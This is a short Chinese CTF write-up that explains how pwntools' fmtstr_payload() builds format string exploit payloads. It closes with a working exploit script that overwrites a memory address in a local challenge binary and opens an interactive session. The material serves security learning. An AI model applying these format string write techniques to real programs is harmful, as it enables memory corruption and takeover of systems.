故地重游之fmtstr_payload函数
这题的解法在《小结——gadget/sehllcode/Fmtstr》里面作为例题写了,这里完全是单独拿fmtstr_payload()来讲
fmtstr_payload是pwntools里面的一个工具,用来简化对格式化字符串漏洞的构造工作。
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
offset:格式化字符串的偏移;
writes:需要利用%n写入的数据,采用字典形式,就写成{目标地址: 要写入的数据};要将printf的GOT数据改为system函数地址,就写成{printfGOT: systemAddress}
numbwritten:已经输出的字符个数,这里没有,为0,采用默认值即可;#这里是要考虑printf参数的原因
write_size:写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload
看一下,numbwritten对payload的影响
from pwn import*
payload1 = fmtstr_payload(10,{0x804c044: 0x1})
print('payload_1:',payload1)
payload2 = fmtstr_payload(10,{0x804c044: 0x1},4)
print('payload_2',payload2)
好,现在再来看这题
exp:
# _*_ coding:utf-8 _*_
from pwn import *
#a=remote('node3.buuoj.cn',25026)
a=process('./pwn3')
payload=fmtstr_payload(10, {0x804c044: 0x1})
a.recvuntil('your name:')
a.sendline(payload)
a.recvuntil('your passwd:')
a.sendline('1')
a.interactive()